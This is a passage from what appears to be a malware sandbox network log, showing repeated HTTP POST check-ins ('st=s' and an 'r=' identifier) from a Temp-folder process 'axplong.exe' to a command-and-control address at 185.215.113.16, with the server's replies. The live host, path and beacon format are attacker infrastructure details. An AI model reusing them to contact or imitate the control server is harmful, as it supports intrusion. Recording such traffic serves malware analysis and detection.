                    6 | 192.168.2.8 | 49716 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:10.069989920 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:10.768558979 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:10.930135965 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:11.157706022 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.8 | 49717 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:11.271292925 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:12.006911993 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:12.007801056 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:12.238358021 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.8 | 49718 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:12.349724054 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:13.067775011 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:13.082161903 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:13.312272072 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.8 | 49719 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:13.466136932 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:14.162620068 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:14.163535118 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:14.390566111 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.8 | 49720 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:14.504458904 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:15.239973068 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:15.241703987 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:15.476587057 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.8 | 49721 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:15.598439932 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:16.330008030 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:16.386358023 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:16.618587971 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.8 | 49722 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:16.825735092 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:17.445417881 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:17.446409941 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:17.677828074 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.8 | 49723 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:17.786559105 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:18.485981941 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:18.486979008 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:18.714329004 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    14 | 192.168.2.8 | 49724 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:18.833049059 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:19.555145025 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:19.557147980 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:19.789901018 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.8 | 49725 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:19.965173006 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:20.678016901 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:20.678956985 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:20.901180983 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.8 | 49726 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:21.025661945 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:21.744201899 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:21.745699883 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:21.972769976 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.8 | 49727 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:22.094440937 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:22.805089951 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:22.881247044 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:23.116976023 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
